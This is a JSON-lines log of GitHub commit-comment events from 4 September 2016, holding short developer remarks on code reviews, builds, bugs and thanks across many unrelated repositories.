{"id":"4513529150","type":"CommitCommentEvent","actor":{"login":"pavoltravnik"},"repo":{"name":"dpp/lawyersongithub"},"payload":{"comment":{"id":18892652,"position":5,"line":412,"path":"index.md","commit_id":"b2625e9c6a344b200ba9d31b3b6cc53a8ae84c54","created_at":"2016-09-04T10:22:19Z","updated_at":"2016-09-04T10:22:19Z","body":"srry wrong address"}},"created_at":"2016-09-04T10:22:19Z"}
{"id":"4513530702","type":"CommitCommentEvent","actor":{"login":"oliverschmidt"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":18892653,"position":null,"line":null,"path":null,"commit_id":"579b89ad98869d13a8f65f9a37e61485243a5c38","created_at":"2016-09-04T10:23:37Z","updated_at":"2016-09-04T10:23:37Z","body":"I pretty strongly dislike commented out code without explanation of the commenting out: https://github.com/cc65/cc65/commit/896b7c1116e90e8f1bb7a8ec92fd556b7144dfdf"}},"created_at":"2016-09-04T10:23:37Z"}
{"id":"4513530998","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/packages_apps_settings"},"payload":{"comment":{"id":18892654,"position":null,"line":null,"path":null,"commit_id":"f52917d8c0e31af6e361255de55acd9cbb8423ed","created_at":"2016-09-04T10:23:54Z","updated_at":"2016-09-04T10:23:54Z","body":"This doesn't seem right to me, why are we picking tabs from AOSIP? We have the know how to build gradle projects inline with our build, we can use that and keep the \"y u copy my rom?\" allegations at bay."}},"created_at":"2016-09-04T10:23:54Z"}
{"id":"4513531395","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892656,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:24:16Z","updated_at":"2016-09-04T10:24:16Z","body":"190409149"}},"created_at":"2016-09-04T10:24:16Z"}
{"id":"4513532821","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":18892660,"position":null,"line":null,"path":null,"commit_id":"ea18f3265c4b3fb65bf73afee8ab1337d939b005","created_at":"2016-09-04T10:25:38Z","updated_at":"2016-09-04T10:25:38Z","body":"@k-plan \r\nThanks for the heads up :+1:  updated to 2.9 : https://github.com/Fourdee/DietPi/commit/0af3562fc2c1a54d609e3be1b3dead5c388a5015"}},"created_at":"2016-09-04T10:25:38Z"}
{"id":"4513533202","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892661,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:25:58Z","updated_at":"2016-09-04T10:25:58Z","body":"190409149"}},"created_at":"2016-09-04T10:25:58Z"}
{"id":"4513536480","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18892663,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T10:28:59Z","updated_at":"2016-09-04T10:28:59Z","body":"What's your gripe here? @kularny \r\n\r\nYou want credit for something that CM has been doing for years now?\r\nhttps://github.com/CyanogenMod/android_vendor_cm/commit/7d5d16dd75df6c883e01d713c35f69a6eebcb313\r\n\r\nI gave @mikeNG credit because that's how I've constantly seen push this up version after version."}},"created_at":"2016-09-04T10:28:59Z"}
{"id":"4513537545","type":"CommitCommentEvent","actor":{"login":"sjperkins"},"repo":{"name":"ska-sa/montblanc"},"payload":{"comment":{"id":18892664,"position":null,"line":null,"path":null,"commit_id":"5e1eedf77f05c4f1154ff67cbd87e274cd9ee26f","created_at":"2016-09-04T10:29:55Z","updated_at":"2016-09-04T10:29:55Z","body":"@o-smirnov We have agreement (everything < 10e-7) with MeqTrees visibilities (beam included) on this commit."}},"created_at":"2016-09-04T10:29:55Z"}
{"id":"4513538495","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892667,"position":20,"line":304,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:30:40Z","updated_at":"2016-09-04T10:30:40Z","body":"190409149"}},"created_at":"2016-09-04T10:30:40Z"}
{"id":"4513539133","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892669,"position":null,"line":null,"path":null,"commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:31:10Z","updated_at":"2016-09-04T10:31:10Z","body":"190409149"}},"created_at":"2016-09-04T10:31:10Z"}
{"id":"4513539240","type":"CommitCommentEvent","actor":{"login":"unghoanglove"},"repo":{"name":"unghoanglove/Learning"},"payload":{"comment":{"id":18892670,"position":2,"line":2,"path":"README.md","commit_id":"541aa1b69fdcb28a30012c5e5ea5db337ebb6bdf","created_at":"2016-09-04T10:31:16Z","updated_at":"2016-09-04T10:31:16Z","body":"DJ website\r\n"}},"created_at":"2016-09-04T10:31:16Z"}
{"id":"4513540423","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892671,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:32:26Z","updated_at":"2016-09-04T10:32:26Z","body":"190409149"}},"created_at":"2016-09-04T10:32:26Z"}
{"id":"4513540468","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":18892672,"position":null,"line":null,"path":null,"commit_id":"2cb6ebe5a75129156b0ca0f4c69dc12cc7caaf42","created_at":"2016-09-04T10:32:29Z","updated_at":"2016-09-04T10:32:29Z","body":"Зачем ещё один логер? у вк есть встроенный\r\n+если хочешь отключать логирование при `!DEBUG` для ошибок лучше иметь отдельный логер"}},"created_at":"2016-09-04T10:32:29Z"}
{"id":"4513541940","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892676,"position":null,"line":null,"path":null,"commit_id":"3b1abf55a2f581a5d9b7937908b385bf297de98b","created_at":"2016-09-04T10:33:50Z","updated_at":"2016-09-04T10:33:50Z","body":"Yh, the template thing is much more nice. Thats how HasAttribute works as well, so it will be consistent."}},"created_at":"2016-09-04T10:33:50Z"}
{"id":"4513542427","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18892678,"position":21,"line":21,"path":"src/pocketmine/block/WallSign.php","commit_id":"309aad9ac8e67bbe3276027fc8f87853bebb5e05","created_at":"2016-09-04T10:34:15Z","updated_at":"2016-09-04T10:34:15Z","body":"OK, you can fix it xD"}},"created_at":"2016-09-04T10:34:15Z"}
{"id":"4513542744","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892679,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:34:30Z","updated_at":"2016-09-04T10:34:30Z","body":"267798091"}},"created_at":"2016-09-04T10:34:30Z"}
{"id":"4513543779","type":"CommitCommentEvent","actor":{"login":"okurz"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":18892682,"position":null,"line":null,"path":null,"commit_id":"ae987875aa3ecdb9fed31ee859c930550e692b4f","created_at":"2016-09-04T10:35:24Z","updated_at":"2016-09-04T10:35:24Z","body":"solved, see https://github.com/os-autoinst/os-autoinst-distri-opensuse/pull/1770#issuecomment-244594441"}},"created_at":"2016-09-04T10:35:24Z"}
{"id":"4513544066","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/hic"},"payload":{"comment":{"id":18892684,"position":null,"line":null,"path":null,"commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-04T10:35:40Z","updated_at":"2016-09-04T10:35:40Z","body":"267798091"}},"created_at":"2016-09-04T10:35:40Z"}
{"id":"4513544938","type":"CommitCommentEvent","actor":{"login":"paul-michalik"},"repo":{"name":"d-led/persistent_observable_experiment"},"payload":{"comment":{"id":18892686,"position":null,"line":null,"path":null,"commit_id":"4efd5a6c0ba25585e3ff952a9a3d52959d105a99","created_at":"2016-09-04T10:36:22Z","updated_at":"2016-09-04T10:36:22Z","body":"This can and will happen with any of the APIs... The backend just has to ensure that fetching the information is atomic. It will always be a snapshot of the current state and the internal implementation of the queue has to assure its atomicity. In terms of implementation it probably doesn't matter any of them can be implemented efficiently..."}},"created_at":"2016-09-04T10:36:22Z"}
{"id":"4513545592","type":"CommitCommentEvent","actor":{"login":"Mensu"},"repo":{"name":"Mensu/huxpro.github.io"},"payload":{"comment":{"id":18892688,"position":13,"line":230,"path":"_includes/footer.html","commit_id":"9534d561190098683ebefb264540741cdb5a68a8","created_at":"2016-09-04T10:36:58Z","updated_at":"2016-09-04T10:36:58Z","body":"site.baseurl should get prepended:\r\nasync(\"{{ '/js/jquery.nav.js' | prepend: site.baseurl }}\", function () {\r\n"}},"created_at":"2016-09-04T10:36:58Z"}
{"id":"4513547030","type":"CommitCommentEvent","actor":{"login":"jimsrc"},"repo":{"name":"bio16/p01"},"payload":{"comment":{"id":18892690,"position":null,"line":null,"path":null,"commit_id":"07f63089245dfad35edc4799f30309838bf0f21c","created_at":"2016-09-04T10:38:14Z","updated_at":"2016-09-04T10:38:14Z","body":"Buenisimo Seba!!"}},"created_at":"2016-09-04T10:38:14Z"}
{"id":"4513548152","type":"CommitCommentEvent","actor":{"login":"ArtyomResh"},"repo":{"name":"ArtyomResh/236435-device"},"payload":{"comment":{"id":18892692,"position":null,"line":null,"path":null,"commit_id":"9a66bad50c3a816164d8912ad7213ba22cab8035","created_at":"2016-09-04T10:38:56Z","updated_at":"2016-09-04T10:38:56Z","body":"Я это случайно..."}},"created_at":"2016-09-04T10:38:56Z"}
{"id":"4513548974","type":"CommitCommentEvent","actor":{"login":"didjee2"},"repo":{"name":"didjee2/BungeeUtilisals"},"payload":{"comment":{"id":18892694,"position":1,"line":1,"path":"src/com/dbsoftware/bungeeutilisals/bungee/events/BanEvent.java","commit_id":"92af38eebc89a7b49561971e650755dd9b92cea7","created_at":"2016-09-04T10:39:38Z","updated_at":"2016-09-04T10:39:38Z","body":"BanEvent, being executed on ban."}},"created_at":"2016-09-04T10:39:38Z"}
{"id":"4513551045","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18892695,"position":null,"line":null,"path":null,"commit_id":"2c36908b28a12dc09ecc6fb6afa69073bccb8a63","created_at":"2016-09-04T10:41:26Z","updated_at":"2016-09-04T10:41:26Z","body":"fixing in rc.sysint is too late for init"}},"created_at":"2016-09-04T10:41:26Z"}
{"id":"4513551759","type":"CommitCommentEvent","actor":{"login":"shanfeng094"},"repo":{"name":"shanfeng094/rainbow"},"payload":{"comment":{"id":18892696,"position":null,"line":null,"path":null,"commit_id":"0262bb77d71e820fca89173987d5f1450e8c3807","created_at":"2016-09-04T10:42:09Z","updated_at":"2016-09-04T10:42:09Z","body":"yellow \r\nred\r\nok\r\nindigo\r\npurple\r\n"}},"created_at":"2016-09-04T10:42:09Z"}
{"id":"4513554577","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18892702,"position":null,"line":null,"path":null,"commit_id":"75e6d14a1e9f839c6c21e38fdb03d58602b6bb16","created_at":"2016-09-04T10:44:36Z","updated_at":"2016-09-04T10:44:36Z","body":"関連付けでmodelsを変更するのを忘れていたので「オリジナリティの追加」でやりました"}},"created_at":"2016-09-04T10:44:36Z"}
{"id":"4513556763","type":"CommitCommentEvent","actor":{"login":"matkovsky"},"repo":{"name":"matkovsky/vue-svg-directive"},"payload":{"comment":{"id":18892706,"position":null,"line":null,"path":null,"commit_id":"e6fe9b200069bc915c1c3fdb8422fdc57368ea53","created_at":"2016-09-04T10:46:27Z","updated_at":"2016-09-04T10:46:27Z","body":"@Phunky Awesome! I just sent a PR. :)"}},"created_at":"2016-09-04T10:46:27Z"}
{"id":"4513557428","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18892708,"position":null,"line":null,"path":null,"commit_id":"a534ccb1bc7e5e2cfa7a51974c77da24e3745948","created_at":"2016-09-04T10:47:02Z","updated_at":"2016-09-04T10:47:02Z","body":"This is only \"stubbed-out\" at the moment because of compiler problems with the implementation/specializations.\r\n\r\nThe next steps are to fix the compile problems so the code is useful to C++03 through C++14, and then benchmark it to see if its a worthwhile addition."}},"created_at":"2016-09-04T10:47:02Z"}
{"id":"4513557640","type":"CommitCommentEvent","actor":{"login":"nallar"},"repo":{"name":"nallar/ModPatcher"},"payload":{"comment":{"id":18892710,"position":null,"line":null,"path":null,"commit_id":"8e90a64715cae1de6604b2627062d3267aa90b58","created_at":"2016-09-04T10:47:13Z","updated_at":"2016-09-04T10:47:13Z","body":"This was wrong since I first added it, but I never tested it thoroughly. Oops."}},"created_at":"2016-09-04T10:47:13Z"}
{"id":"4513557974","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18892711,"position":21,"line":21,"path":"src/pocketmine/block/WallSign.php","commit_id":"309aad9ac8e67bbe3276027fc8f87853bebb5e05","created_at":"2016-09-04T10:47:31Z","updated_at":"2016-09-04T10:47:31Z","body":"Did that already :D"}},"created_at":"2016-09-04T10:47:31Z"}
{"id":"4513558520","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"toffaletti/state-threads"},"payload":{"comment":{"id":18892712,"position":null,"line":null,"path":null,"commit_id":"7f57fc9acc05e657bca1223f1e5b9b1a45ed929b","created_at":"2016-09-04T10:48:01Z","updated_at":"2016-09-04T10:48:01Z","body":"👍 \r\nMerged to https://github.com/ossrs/state-threads/issues/2, thanks very much~"}},"created_at":"2016-09-04T10:48:01Z"}
{"id":"4513561322","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18892717,"position":null,"line":null,"path":null,"commit_id":"75e6d14a1e9f839c6c21e38fdb03d58602b6bb16","created_at":"2016-09-04T10:50:21Z","updated_at":"2016-09-04T10:50:21Z","body":"関連付けでmodelsを変更するのを忘れていたので「オリジナリティの追加」でやりました"}},"created_at":"2016-09-04T10:50:21Z"}
{"id":"4513567330","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":18892738,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-04T10:55:37Z","updated_at":"2016-09-04T10:55:37Z","body":"May I ask you if this is important for the kernel or is it really just to get rid of a warning?"}},"created_at":"2016-09-04T10:55:37Z"}
{"id":"4513571301","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892750,"position":null,"line":null,"path":null,"commit_id":"3b1abf55a2f581a5d9b7937908b385bf297de98b","created_at":"2016-09-04T10:59:22Z","updated_at":"2016-09-04T10:59:22Z","body":"Thanks, will update."}},"created_at":"2016-09-04T10:59:22Z"}
{"id":"4513571618","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18892752,"position":null,"line":null,"path":null,"commit_id":"4c24a7eb4e48805d51906bef51458e450dbfdb0e","created_at":"2016-09-04T10:59:40Z","updated_at":"2016-09-04T10:59:40Z","body":"・日本語化\r\n・「モデルの関連付け」でするのを忘れていたmodelsの変更\r\n・見やすくするために色を付けた\r\n・herokuにpushするための準備\r\n・（一番最初に完成したToDoListをほとんどそのまま上書きしたので、変なところが変更されていたりします）"}},"created_at":"2016-09-04T10:59:40Z"}
{"id":"4513572551","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18892755,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-04T11:00:22Z","updated_at":"2016-09-04T11:00:22Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.157](http://build.clear-measure.com/viewLog.html?buildId=10364&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-04T11:00:22Z"}
{"id":"4513575369","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18892758,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-04T11:02:38Z","updated_at":"2016-09-04T11:02:38Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.157](http://build.clear-measure.com/viewLog.html?buildId=10364&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:16"}},"created_at":"2016-09-04T11:02:38Z"}
{"id":"4513575598","type":"CommitCommentEvent","actor":{"login":"Jjk422"},"repo":{"name":"cliffe/SecGen"},"payload":{"comment":{"id":18892759,"position":null,"line":null,"path":null,"commit_id":"060fbab612fe185e475c01e91bab7d9940620fce","created_at":"2016-09-04T11:02:49Z","updated_at":"2016-09-04T11:02:49Z","body":"Why are we installing a specific vagrant version instead of the newest version?"}},"created_at":"2016-09-04T11:02:49Z"}
{"id":"4513576537","type":"CommitCommentEvent","actor":{"login":"CopKubar"},"repo":{"name":"CopKubar/test"},"payload":{"comment":{"id":18892761,"position":1,"line":1,"path":"king.html","commit_id":"fde4456e3c53d146bc6db130f2045bb5a5943735","created_at":"2016-09-04T11:03:40Z","updated_at":"2016-09-04T11:03:40Z","body":"<B>Changed<B>"}},"created_at":"2016-09-04T11:03:40Z"}
{"id":"4513577180","type":"CommitCommentEvent","actor":{"login":"mickalishus"},"repo":{"name":"mickalishus/hello-world"},"payload":{"comment":{"id":18892764,"position":null,"line":null,"path":null,"commit_id":"0544e70aa2c97ea0df833914d7e47e75005be666","created_at":"2016-09-04T11:04:13Z","updated_at":"2016-09-04T11:04:13Z","body":"fellow mongrels,\r\n\r\nmickalishus is a ufc addict with serious issues!!!\r\nplease feed me ufc based addons with heaps of free ppv tips passwords etc.\r\n\r\nthanks for being a loyal mongrel!_"}},"created_at":"2016-09-04T11:04:13Z"}
{"id":"4513584674","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18892775,"position":null,"line":null,"path":null,"commit_id":"481515313324ce4ffea8a488abcf612062abe1b9","created_at":"2016-09-04T11:10:12Z","updated_at":"2016-09-04T11:10:12Z","body":"#340"}},"created_at":"2016-09-04T11:10:12Z"}
{"id":"4513585596","type":"CommitCommentEvent","actor":{"login":"Arkhana"},"repo":{"name":"Arkhana/install-rutorrent-bonobox"},"payload":{"comment":{"id":18892776,"position":null,"line":null,"path":null,"commit_id":"ad5eab10e597f1037d0404a77bd45896ebc3f588","created_at":"2016-09-04T11:10:58Z","updated_at":"2016-09-04T11:10:58Z","body":"update js"}},"created_at":"2016-09-04T11:10:58Z"}
{"id":"4513588073","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/editorconfig"},"payload":{"comment":{"id":18892777,"position":null,"line":null,"path":null,"commit_id":"8c8cabf77db35476159cc8f52150037dbcc10d8a","created_at":"2016-09-04T11:13:00Z","updated_at":"2016-09-04T11:13:00Z","body":"deja vu..."}},"created_at":"2016-09-04T11:13:00Z"}
{"id":"4513589713","type":"CommitCommentEvent","actor":{"login":"k-plan"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":18892778,"position":null,"line":null,"path":null,"commit_id":"ea18f3265c4b3fb65bf73afee8ab1337d939b005","created_at":"2016-09-04T11:14:30Z","updated_at":"2016-09-04T11:14:30Z","body":"@Fourdee \r\n\r\n👍 \r\n\r\n... but https://github.com/Fourdee/AdminLTE/commit/f43a3377111d4603402097e718fb5d5d741e4647\r\n\r\nis missing\r\n\r\nhttps://github.com/Fourdee/DietPi/blob/testing/dietpi/dietpi-software#L3066\r\n\r\nin 04_09_2016 git\r\n\r\nhttps://github.com/Fourdee/AdminLTE/blob/04_09_2016/header.php#L2"}},"created_at":"2016-09-04T11:14:30Z"}
{"id":"4513591456","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892781,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T11:16:07Z","updated_at":"2016-09-04T11:16:07Z","body":"eh, assertion:\r\n\r\n..\\..\\src\\game\\AI\\GuardianAI.cpp:28: Error: Assertion in GuardianAI::GuardianAI failed: m_owner\r\nStack Trace:\r\nGuardianAI::GuardianAI() e:\\mangos\\335\\src\\game\\ai\\guardianai.cpp: 28 + 0x12\r\nCreatureAIFactory<GuardianAI>::Create() e:\\mangos\\335\\src\\game\\ai\\creatureaiimpl.h: 29 + 0x0\r\nFactorySelector::selectAI() e:\\mangos\\335\\src\\game\\ai\\creatureaiselector.cpp: 106 + 0x3e\r\nCreature::AIM_Initialize() e:\\mangos\\335\\src\\game\\creature.cpp: 988 + 0x6\r\nCreature::LoadFromDB() e:\\mangos\\335\\src\\game\\creature.cpp: 1695 + 0x0\r\nLoadHelper<Creature>() e:\\mangos\\335\\src\\game\\objectgridloader.cpp: 118 + 0x12\r\nObjectGridLoader::Visit() e:\\mangos\\335\\src\\game\\objectgridloader.cpp: 206 + 0x15\r\nVisitorHelper<ObjectGridLoader,Creature>() e:\\mangos\\335\\src\\framework\\gamesystem\\typecontainervisitor.h: 51 + 0x0\r\nObjectGridLoader::Load() e:\\mangos\\335\\src\\game\\objectgridloader.cpp: 237 + 0x0\r\nObjectGridLoader::LoadN() e:\\mangos\\335\\src\\game\\objectgridloader.cpp: 251 + 0x0\r\nMap::EnsureGridLoaded() e:\\mangos\\335\\src\\game\\map.cpp: 291 + 0x0\r\nMap::EnsureGridLoadedAtEnter() e:\\mangos\\335\\src\\game\\map.cpp: 253 + 0x0\r\nMap::ForceLoadGrid() e:\\mangos\\335\\src\\game\\map.cpp: 324 + 0x0\r\nObjectMgr::LoadActiveEntities() e:\\mangos\\335\\src\\game\\objectmgr.cpp: 10306 + 0x0\r\nMapManager::CreateMap() e:\\mangos\\335\\src\\game\\mapmanager.cpp: 83 + 0x0\r\n...\r\n"}},"created_at":"2016-09-04T11:16:07Z"}
{"id":"4513595852","type":"CommitCommentEvent","actor":{"login":"sonsory"},"repo":{"name":"sonsory/bcode"},"payload":{"comment":{"id":18892787,"position":null,"line":null,"path":null,"commit_id":"789c186c78bf2a2abb22650c868aac8113af70c9","created_at":"2016-09-04T11:20:08Z","updated_at":"2016-09-04T11:20:08Z","body":"cvcx"}},"created_at":"2016-09-04T11:20:08Z"}
{"id":"4513596789","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18892790,"position":null,"line":null,"path":null,"commit_id":"9bf228042146b966b02255bb7cce7c7130c7fe99","created_at":"2016-09-04T11:20:52Z","updated_at":"2016-09-04T11:20:52Z","body":"Apparently this also adds MediaInfo.dll to dependencies. I don't know why it committed for me, but I saw an issue that said it was needed, so whatever. Remove if it needs to be."}},"created_at":"2016-09-04T11:20:52Z"}
{"id":"4513598160","type":"CommitCommentEvent","actor":{"login":"Rainrider"},"repo":{"name":"RealUI/RealUI"},"payload":{"comment":{"id":18892792,"position":null,"line":null,"path":null,"commit_id":"97ad2b908d96b2bb0bd04c43c732a8ab92238f13","created_at":"2016-09-04T11:22:10Z","updated_at":"2016-09-04T11:22:10Z","body":"ARTIFACT_UPDATE is not being triggered after every loading screen by default unless there is an addon that makes it trigger. You are right though, that PEW can be safely unregistered after first use.\r\n\r\nDo you have any particular reason not to issue a pull request to me but rather run your own fork?"}},"created_at":"2016-09-04T11:22:10Z"}
{"id":"4513598824","type":"CommitCommentEvent","actor":{"login":"premals"},"repo":{"name":"premals/Hotel_Registration"},"payload":{"comment":{"id":18892794,"position":null,"line":null,"path":null,"commit_id":"bb098f244347bdac8859dd5f7e9e600f986d489f","created_at":"2016-09-04T11:22:49Z","updated_at":"2016-09-04T11:22:49Z","body":"Api"}},"created_at":"2016-09-04T11:22:49Z"}
{"id":"4513599073","type":"CommitCommentEvent","actor":{"login":"hermann0111"},"repo":{"name":"hermann0111/WazaTest"},"payload":{"comment":{"id":18892795,"position":null,"line":null,"path":null,"commit_id":"670749ae9740b13481d4e45fa38592a27944d609","created_at":"2016-09-04T11:23:04Z","updated_at":"2016-09-04T11:23:04Z","body":"Lool j'écris n'imp, c'est pour tester des trucs.\r\nDon't worry!\r\n"}},"created_at":"2016-09-04T11:23:04Z"}
{"id":"4513599959","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892802,"position":null,"line":null,"path":null,"commit_id":"100bd86a68b5ee84669d162c9bcda31616f6596a","created_at":"2016-09-04T11:23:49Z","updated_at":"2016-09-04T11:23:49Z","body":"Thanks!"}},"created_at":"2016-09-04T11:23:49Z"}
{"id":"4513602014","type":"CommitCommentEvent","actor":{"login":"cactimurray"},"repo":{"name":"bigcartel/dugway"},"payload":{"comment":{"id":18892807,"position":null,"line":null,"path":null,"commit_id":"835daab6faf5da42937699b0785fa0b2f5d40286","created_at":"2016-09-04T11:25:40Z","updated_at":"2016-09-04T11:25:40Z","body":"This seems to break the \"constrain\" filter when only one dimension is provided. For example: \r\n`{{ image | product_image_url | constrain: '1000'}}`\r\nproduces a URL of: \r\n\r\n> path_to_image.jpg?h=0&w=1000\r\n\r\n which causes an error a 402 error and a missing image in the browser. The correct path should return as: \r\n\r\n> path_to_image.jpg?w=1000\r\n\r\nI added in a case statement in to deal with this but I'm not very familiar with ruby so I'm sure there's a more elegant solution."}},"created_at":"2016-09-04T11:25:40Z"}
{"id":"4513603018","type":"CommitCommentEvent","actor":{"login":"Aspsine"},"repo":{"name":"Aspsine/IRecyclerView"},"payload":{"comment":{"id":18892808,"position":null,"line":null,"path":null,"commit_id":"2a2655a68813b74ee57c3c9d43c422f4d30a4888","created_at":"2016-09-04T11:26:34Z","updated_at":"2016-09-04T11:26:34Z","body":"#19 \r\n\r\nGridLayoutManager support setSpanSizeLookUp(SpanSizeLookUp)."}},"created_at":"2016-09-04T11:26:34Z"}
{"id":"4513604160","type":"CommitCommentEvent","actor":{"login":"tao12345666333"},"repo":{"name":"PyConChina/PyConChina2016"},"payload":{"comment":{"id":18892811,"position":null,"line":null,"path":null,"commit_id":"bb0f1b8abbd1f98f89caf847f95e0720be5256e0","created_at":"2016-09-04T11:27:40Z","updated_at":"2016-09-04T11:27:40Z","body":"close #21 "}},"created_at":"2016-09-04T11:27:40Z"}
{"id":"4513605117","type":"CommitCommentEvent","actor":{"login":"KlonZK"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":18892812,"position":null,"line":null,"path":null,"commit_id":"7bc2825ee138fc5699eeb2ab8b32222e2e0823e0","created_at":"2016-09-04T11:28:31Z","updated_at":"2016-09-04T11:28:31Z","body":"the actual error seems to be deprecated font files that dont automatically get updated/replaced when new lobby is ran. they do get installed into a fresh folder tho, and manually copying them over the old fonts fixed the issue. "}},"created_at":"2016-09-04T11:28:31Z"}
{"id":"4513606351","type":"CommitCommentEvent","actor":{"login":"Slaweally"},"repo":{"name":"maksatweb/simple_firewall"},"payload":{"comment":{"id":18892813,"position":6,"line":5,"path":"firewall.php","commit_id":"6a0847af14c9ac34fb8f2bee03f1fb6baa3e2414","created_at":"2016-09-04T11:29:27Z","updated_at":"2016-09-04T11:29:27Z","body":"1,1"}},"created_at":"2016-09-04T11:29:27Z"}
{"id":"4513613306","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18892819,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T11:35:18Z","updated_at":"2016-09-04T11:35:18Z","body":"cc @dezgeg @abbradar @edol"}},"created_at":"2016-09-04T11:35:18Z"}
{"id":"4513613952","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18892820,"position":2,"line":1,"path":"Front_Staff/Acknowledgments.tex","commit_id":"2616757309a0adba284b8cb73ce578762426b7c0","created_at":"2016-09-04T11:35:54Z","updated_at":"2016-09-04T11:35:54Z","body":"There maybe some conflit in tex files when push, I haven't modified them yet. For the present the modifications in tex files can be ignored, the corrections still remains in the history, I'll treat them soon after."}},"created_at":"2016-09-04T11:35:54Z"}
